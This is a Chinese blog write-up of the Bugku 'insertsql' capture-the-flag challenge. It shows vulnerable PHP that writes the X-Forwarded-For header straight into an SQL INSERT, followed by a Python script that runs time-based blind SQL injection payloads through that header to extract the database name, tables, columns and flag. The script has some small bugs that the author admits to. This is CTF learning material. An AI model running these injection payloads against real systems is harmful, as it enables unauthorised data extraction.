zoukankan      html  css  js  c++  java
  • bugku insertsql

    题目链接

    0X00题目给出的PHP代码

    error_reporting(0);
    
    function getIp(){
    $ip = '';
    if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){
    $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
    }else{
    $ip = $_SERVER['REMOTE_ADDR'];
    }
    $ip_arr = explode(',', $ip);
    return $ip_arr[0];
    
    }
    
    $host="localhost";
    $user="";
    $pass="";
    $db="";
    
    $connect = mysql_connect($host, $user, $pass) or die("Unable to connect");
    
    mysql_select_db($db) or die("Unable to select database");
    
    $ip = getIp();
    echo 'your ip is :'.$ip;
    $sql="insert into client_ip (ip) values ('$ip')";  //将得到的IP插入到数据库
    mysql_query($sql);

    0x01 insert sql漏洞

    将消息插入数据库

    一般出现地方:电商生成订单接口存在INSERT型SQL注入漏洞,可修改订单金额数据,生成订单时会往数据库插入数据,但此处使用了动态查询语句的方式进行插入,通过注入数据可以达到篡改订单数据的目的

    本题注入点X_FORWARDED_FOR  

    0x02 Python 脚本:

      1 import requests
      2 import sys
      3 import string
      4 
      5 def getdblen(url):  #获得库名长度
      6     sql="1'+(select case when(select length(database())={0}) then sleep(4) else 1 end) and '1'='1"
      7     for i in range(1,50):
      8         header={'X-Forwarded-For':sql.format(str(i))}
      9         try:
     10             s=requests.get(url,headers=header,timeout=3)
     11         except:
     12             print("database name len:",i)
     13             break
     14 
     15 def gettablelen(url):  #获得数据表名长度  没有输出 不知道错误在哪 很烦~~,查不到错误。有没有limit 都没有输出
     16     #limit的作用是查询到好几行数据,选取其中的几行  limit 1,1就是 第二行一行的数据(从0开始计算行数)
     17     sql="'+(select case when(select length((select table_name from information_schema.tables where table_schema=database() limit {0},1))={1}) then sleep(4) else 1 end) and '1'='1"
     18     for n in range(0,5):
     19         for i in range(1,20):
     20             header={'X-Forwarded-For':sql.format(str(n),str(i))}
     21             try:
     22                 s=requests.get(url,headers=header,timeout=3)
     23             except:
     24                 print("table %s name len:%d"%(n,i))
     25                 break
     26 
     27 def getdb(url):
     28     database_name=''
     29     sql="1' and (case when (substr((select database()) from {0} for 1)='{1}') then sleep(4) else 1 end) and '1'='1"
     30     #逐个字母破解数据库名,{0}、{1}相当于标记了两处变量,用于下面的format语句
     31     for i in range(1,10): #猜测数据库名字在9个字符以内
     32         for str in range(32,129): #通过循环,逐个字母匹配
     33             if chr==128:
     34                 sys.exit(0)#如果没有匹配,就退出循环
     35             header={'X-Forwarded-For':sql.format(i,chr(str))}
     36             try:
     37                 s=requests.get(url,headers=header,timeout=3)
     38             except:
     39                 database_name+=chr(str)
     40                 print(database_name)
     41                 break
     42     return database_name
     43 
     44 def gettable(url):
     45     table_name=''
     46     payload="'+(select case when (substr((select group_concat(table_name) from information_schema.tables where table_schema=database()) from {0} for 1)='{1}') then sleep(4) else 1 end) and '1'='1"
     47     guess = string.ascii_lowercase+string.ascii_uppercase+string.digits+string.punctuation
     48     for i in range(1,50):
     49         #print(i)
     50         for str in guess:
     51             if ord(str)==128:
     52                 sys.exit(0)
     53             header={'X-Forwarded-For':payload.format(i,str)}
     54             try:
     55                 s=requests.get(url,headers=header,timeout=3)
     56             except:
     57                 table_name+=str
     58                 print(table_name)
     59                 break
     60     return table_name
     61 
     62 def getcolumn(url):
     63     column_name=''
     64     sql="'+(select case when (substr((select group_concat(column_name) from information_schema.columns where table_name='flag') from {0} for 1)='{1}') then sleep(4) else 1 end) and '1'='1"
     65     #guess = string.ascii_lowercase+string.ascii_uppercase+string.digits+string.punctuation
     66     for i in range(20):
     67         for str in range(32,129):
     68             if str==128:
     69                 sys.exit(0)
     70             payload={'X-Forwarded-For':sql.format(i,chr(str))}
     71             try:
     72                 s=requests.get(url,headers=payload,timeout=3)
     73             except:
     74                 column_name+=chr(str)
     75                 print(column_name)
     76                 break
     77     return column_name
     78 
     79 def getmessage(url):
     80     message=''
     81     sql="'+(select case when(substr((select group_concat(flag) from flag)from {0} for 1)='{1}') then sleep(4) else 1 end) and '1'='1"
     82     for i in range(1,35):
     83         for str in range(32,129):
     84             if str==128:
     85                 sys.exit(0)
     86             payload={'X-Forwarded-For':sql.format(i,chr(str))}
     87             try:
     88                 s=requests.get(url,headers=payload,timeout=3)
     89             except:
     90                 message+=chr(str)
     91                 print(message)
     92                 break
     93     return message
     94 
     95 
     96 if __name__=='__main__':
     97     url="http://123.206.87.240:8002/web15/"
     98     print(getdb(url))
     99     #tablename = gettable(url)
    100     #print(tablename)
    101     #columname = getcolumn(url)
    102     #message=getmessage(url)
    103     
    104     #print(temp.lower())
    105     #getdblen(url)
    106     #gettablelen(url)
    107     #getdb(url)
    108     

    代码借鉴了其他人的wp,并加上自己的一点想法,查询名长度等

    总结:要加强写脚本的能力,多学习mysql语句,有好几个语句是因为不对才没有注入成功的。

  • 相关阅读:
    python3线程介绍01(如何启动和调用线程)
    CentOS7 设置静态 ip
    png2ico
    Thunderbird 配置 QQ mail
    memcached 开机启动 (Ubuntu)
    CentOS7 docker 安装的 container-selinux 问题及解决
    YAML 的基本语法
    docker 的脚本化安装和使用
    解决Windows下 “setup.py build” 时出现错误 ” error: Unable to find vcvarsall.bat”
    Electric Fence
  • 原文地址:https://www.cnblogs.com/liqik/p/11025897.html
Copyright © 2011-2022 走看看